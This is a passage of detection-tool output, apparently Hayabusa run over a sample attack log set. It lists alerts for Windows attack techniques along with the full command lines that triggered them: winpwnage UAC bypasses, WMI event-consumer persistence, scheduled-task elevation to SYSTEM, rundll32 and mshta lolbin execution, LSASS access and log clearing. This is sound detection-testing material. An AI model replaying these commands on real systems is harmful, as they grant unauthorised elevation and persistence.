Command: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx -2019-05-12 01:54:12.821 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\sysprep /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx -2019-05-12 02:10:06.342 +09:00,IEWIN7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx -2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,informational,Logon Type 9 - NewCredentials,User: IEUser : Workstation: : IP Address: ::1 : Port: 0 : LogonID: 0x1bbdce : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx -2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx -2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx -2019-05-12 02:28:17.176 +09:00,IEWIN7,1,informational,Process Creation,"Command: 
python winpwnage.py -u uac -i 17 -p c:\windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx -2019-05-12 02:28:19.567 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmstp.exe"" /au c:\users\ieuser\appdata\local\temp\tmp.ini : Path: C:\Windows\System32\cmstp.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 17 -p c:\windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx -2019-05-12 02:28:19.567 +09:00,IEWIN7,1,high,Bypass UAC via CMSTP,,rules/sigma/process_creation/win_uac_cmstp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx -2019-05-12 02:28:22.598 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7},rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx -2019-05-12 02:28:22.598 +09:00,IEWIN7,13,high,CMSTP Execution Registry Event,,rules/sigma/registry_event/sysmon_cmstp_execution_by_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx -2019-05-12 02:28:22.598 +09:00,IEWIN7,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx -2019-05-12 02:57:49.903 +09:00,IEWIN7,1,informational,Process 
Creation,"Command: python winpwnage.py -u elevate -5 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:22.809 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:23.215 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH CommandLineEventConsumer CREATE Name=""BotConsumer23"", ExecutablePath=""c:\Windows\System32\cmd.exe"", CommandLineTemplate=""c:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:23.450 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __FilterToConsumerBinding CREATE Filter='__EventFilter.Name=""BotFilter82""', Consumer='CommandLineEventConsumer.Name=""BotConsumer23""' : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:23.590 
+09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __EventFilter CREATE Name=""BotFilter82"", EventNameSpace=""root\cimv2"", QueryLanguage=""WQL"", Query=""SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:50.090 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:54.887 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH CommandLineEventConsumer WHERE Name=""BotConsumer23"" DELETE : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p 
c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:55.028 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __EventFilter WHERE Name=""BotFilter82"" DELETE : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:55.153 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=""BotFilter82""' DELETE : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 03:10:42.434 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u elevate -i 1 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx -2019-05-12 03:10:42.668 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\lsass.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx -2019-05-12 03:10:42.668 +09:00,IEWIN7,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx -2019-05-12 09:32:24.461 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx -2019-05-12 09:32:30.211 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /create /xml c:\users\ieuser\appdata\local\temp\elevator.xml /tn elevator : Path: C:\Windows\System32\schtasks.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx -2019-05-12 09:32:30.211 +09:00,IEWIN7,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx -2019-05-12 09:32:30.211 +09:00,IEWIN7,1,high,Suspicius Add Task From User AppData Temp,,rules/sigma/process_creation/win_pc_susp_schtasks_user_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx -2019-05-12 09:32:35.258 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /run /tn elevator : Path: C:\Windows\System32\schtasks.exe : User: IEWIN7\IEUser : Parent 
Command: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx -2019-05-12 09:32:35.352 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: taskeng.exe {9C7BC894-6658-423B-9B58-61636DBB1451} S-1-5-18:NT AUTHORITY\System:Service:,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx -2019-05-12 09:32:40.342 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /delete /tn elevator : Path: C:\Windows\System32\schtasks.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx -2019-05-12 22:30:32.931 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:30:46.400 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u execute -i 9 -p 
c:\Windows\system32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:30:46.400 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:30:46.556 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\rundll32.exe"" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:32:58.167 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:32:58.167 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:33:37.078 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe url.dll,FileProtocolHandler calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:33:37.078 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:33:59.743 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:33:59.743 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:38:00.523 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:38:00.523 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:38:00.712 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\mshta.exe"" ""C:\programdata\calc.hta"" : Path: 
C:\Windows\System32\mshta.exe : User: IEWIN7\IEUser : Parent Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:38:01.383 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\mshta.exe"" ""C:\programdata\calc.hta"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:55:56.626 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx -2019-05-12 22:56:12.652 
+09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx -2019-05-12 22:56:12.652 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx -2019-05-12 22:58:39.850 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx -2019-05-12 22:58:54.897 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx -2019-05-12 22:58:54.897 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx -2019-05-12 23:18:03.589 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: 
C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx -2019-05-12 23:18:09.589 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx -2019-05-12 23:18:09.589 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx -2019-05-13 02:01:43.391 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx -2019-05-13 02:01:50.781 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\pcalua.exe"" -a c:\Windows\system32\calc.exe : Path: C:\Windows\System32\pcalua.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx -2019-05-13 02:01:51.007 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\pcalua.exe"" -a 
c:\Windows\system32\calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx -2019-05-13 02:01:51.007 +09:00,IEWIN7,1,low,Indirect Command Execution,,rules/sigma/process_creation/win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx -2019-05-13 02:09:02.275 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx -2019-05-13 02:09:02.275 +09:00,IEWIN7,1,medium,Code Execution via Pcwutl.dll,,rules/sigma/process_creation/win_susp_pcwutl.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx -2019-05-13 02:09:02.275 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx -2019-05-13 02:20:01.980 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx -2019-05-13 02:20:31.183 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u execute -i 11 -p c:\Windows\system32\calc.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx -2019-05-13 02:20:49.443 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\ftp.exe"" -s:c:\users\ieuser\appdata\local\temp\ftp.txt",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx -2019-05-13 02:20:49.443 +09:00,IEWIN7,1,medium,Suspicious ftp.exe,,rules/sigma/process_creation/win_susp_ftp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx -2019-05-13 02:20:49.458 +09:00,IEWIN7,1,informational,Process Creation,Command: 